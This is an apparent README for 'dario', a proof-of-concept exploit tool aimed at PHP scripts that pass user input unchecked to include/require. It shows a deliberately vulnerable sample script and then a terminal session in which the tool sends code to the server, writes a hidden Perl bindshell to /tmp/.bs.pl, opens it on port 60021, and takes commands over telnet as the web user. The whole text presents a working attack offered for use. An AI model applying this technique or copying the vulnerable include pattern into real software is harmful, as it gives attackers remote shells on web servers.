dario is a proof-of-concept exploit against unsecure .php scripts
that allows the user to have uncontrolled use of include(_once)/
require(_once) functions.


Example:

hannes@sagomah:~/dario$ make
cc -o dario asyfsio.c dario.c
hannes@sagomah:~/dario$ cat /www/bla.php 
<?
include_once($HTTP_GET_VARS[file]);
?>
hannes@sagomah:~/dario$ ./dario http://localhost/bla.php?file=
----------- DARIO ----------
Initing asyfsio...
Trying localhost:80..
Connected to 127.0.0.1:80 (from 127.0.0.1:59425)
Waiting for incoming connection...
Whooohoo, rock'n roll...
Sending evil code...
REMOTE> System... Linux
REMOTE> OS Version... 2.4.20
REMOTE> Perl... Ok
REMOTE> Bindshell saved to /tmp/.bs.pl
REMOTE> Bindshell launching (port 60021)..
REMOTE> Hope it's working..
-- telnet localhost 60021
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
(nobody@sagomah:/www)
id;
uid=65534(nobody) gid=4294967295 groups=4294967295
: command not found
who -u;
root     tty1         May 19 22:47 01:04         251         
root     pts/1        May 19 23:46   .          1892 (192.168.200.200)
: command not found
exit;
Connection closed by foreign host.
hannes@sagomah:~/dario$ 

by lordi@uberhax0r.de
